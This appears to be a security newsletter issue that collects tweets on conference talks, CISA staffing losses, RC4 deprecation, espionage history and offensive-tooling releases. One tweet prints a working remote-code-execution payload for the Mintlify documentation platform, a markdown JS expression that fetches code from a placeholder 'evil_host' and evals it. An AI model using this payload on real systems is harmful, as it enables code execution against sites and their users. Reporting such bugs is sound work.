the grugq's newsletter

December 23, 2025

December 22-23, 2025


New BSides Canberra 2025 talk by “Alex” @mangopdf is now live:
“let’s make malware but it might get caught so the malware gets worse.”
Watch here: https://t.co/JYOk6qnP6f

— BSidesCanberra (@BSidesCbr) December 22, 2025



A complete disaster at the agency responsible for US cyber defence. "Nearly a third of its staff have left the agency since January, and some were recently given an ultimatum to either move into immigration-related roles at the Dept of Homeland Security...or leave the agency." https://t.co/Q7s2rQDuvj

— Shashank Joshi (@shashj) December 21, 2025


The Art of Pivoting - Techniques for Intelligence Analysts to Discover New Relationships in a Complex World https://t.co/KDssYRorpT

— Matthew Green 🌻 (@mgreen27) December 22, 2025


In 2011 Wikileaks released this. It's from the British Griffcomm that develops gov. spying gear since 1979. The BAM (Bodyworn Array Microphone) was a wearable array of 24 microphones that filtered out all noise apart from the target's voice. Designed for spying in noisy places. pic.twitter.com/KCivuBNmYp

— Spy Collection (@SpyCollection1) December 21, 2025


CVE-2007-0450 😭 Starbucks vulnerable to shit older than the people exploiting it at this point. https://t.co/YUTSCrwkw0

— Marco Bonelli (@mebeim) December 21, 2025


I am a Microsoft security architect.

In 1994, researchers discovered RC4 was fundamentally broken.

We made it the default cipher in Windows anyway.

By 2000, every machine on Earth was running it.

We called it "battle-tested."

Technically true. It lost every battle.

In 2013,… pic.twitter.com/9TvOHC0EAn

— Peter Girnus 🦅 (@gothburz) December 21, 2025

Microsoft Is Finally Killing RC4 https://t.co/j0WyoEY0aU

— Schneier Blog (@schneierblog) December 22, 2025


Erm, nope. Post-Venlo in Nov 1939 when the SD capture 2 SIS officers, the German underground/Nazi opposition are given a wide berth. The idea that SIS is somehow involved in the July plot is good fiction, poor history. https://t.co/mTJ9oxSEln

— Dr. Dan Lomas (@Sandbagger_01) December 21, 2025


The US government declassifying a PoC:

#include<▇▇▇▇.h>
int ▇▇▇_▇▇▇▇ {
▇▇▇▇▇▇▇
▇▇▇▇▇▇
▇▇▇▇▇ ▇▇▇
return ▇▇;
}
/*
* ▇▇▇▇▇ ▇▇▇
* ▇▇▇▇▇▇▇ ▇
*/

— faulty *ptrrr (@0x_shaq) December 20, 2025


New BSides Canberra 2025 talk by Ayman Sagy is now live:
“Ding Dong The EDR is DEAD.”
Watch here: https://t.co/10c94Ss8yr

— BSidesCanberra (@BSidesCbr) December 22, 2025


if you didn't have enough of react2shell, here's a crazy RCE in a popular platform mintlify that's used for documentation

the wild part is the payload is just a JS expression within markdown

{!!fetch("evil_host").then((r) => r.text()).then((c) => eval(c))}

#bugbounty pic.twitter.com/rdF8w7XLaD

— payloadartist (@payloadartist) December 20, 2025


All about a previously undescribed DCOM object that can be used for lateral movement: https://t.co/0Ad5RnXV0t pic.twitter.com/eO6ZaOCxz3

— Eugene Kaspersky (@e_kaspersky) December 19, 2025


Most people would say Windows, but the one with less impact is macOS. Deleting Linux or Windows all of a sudden could be catastrophic, but we can survive without macOS.

So, obviously, I delete Windows. https://t.co/LCvLEoJdwh

— Zuhaitz (@zuhaitz_dev) December 20, 2025


[RELEASE] Part two is out! Callback chaining with tail calls and proxy frames to build semi-artificial call stacks and maybe annoy a few detection rules. Nothing ground breaking, but maybe somebody can pick up an idea or two.
Enjoy 😉 https://t.co/RFDBZfPJdl

— klez (@KlezVirus) December 22, 2025


the story behind what actually led to the alcohol ban in Saudi Arabia is wild https://t.co/VvLKLgGjYg pic.twitter.com/6lTAs0tIHg

— a rare photo of sean connery signed by roger moore (@steamedhamms) December 21, 2025


Logging Made Easy (LME) is a no cost, open source platform that centralizes log collection, enhances threat detection, and enables real-time alerting, helping small to medium-sized organizations secure their infrastructure https://t.co/j762xnq6c4

— Panos Gkatziroulis 🦄 (@ipurple) December 22, 2025


man.

with this epstein website @rtwlz has created something that’s half ingenious user interface to navigate an enormous data dump, and half perverse art project that is as creepy as it is novel

emails, photos, flights, amazon orders https://t.co/Jz9enRHGtq pic.twitter.com/1Q1eQvvX6f

— rat king 🐀 (@MikeIsaac) December 21, 2025


There she blows!! Wyrm, v0.7 is out, slowly inching towards an official stable v1.0 :) feedback as to features / improvements is welcome either via DM or GitHub issues! https://t.co/CMCr9DGecU

Change log:

- Updated docs at https://t.co/dxvePIBpkr
- Wyrm now builds as a… pic.twitter.com/M1b38n2fgq

— flux (@0xfluxsec) December 22, 2025


This week I had the pleasure of guest lecturing at both Georgetown University and Johns Hopkins SAIS on the intersection of AI, cyber and national security. You can find a brief overview of the topics I covered and my slides here. https://t.co/2bmRfKyFGc

— chrisrohlf (@chrisrohlf) October 25, 2025


As others have noted, during a disaster with a consequent power outage, Waymos would be blocking evacuation routes. Hard to believe no one asked these questions, until you realize that good governance is suspended when billionaires knock on the door. https://t.co/4YnwlOt2Ep

— Jaime Omar Yassin (@hyphy_republic) December 21, 2025

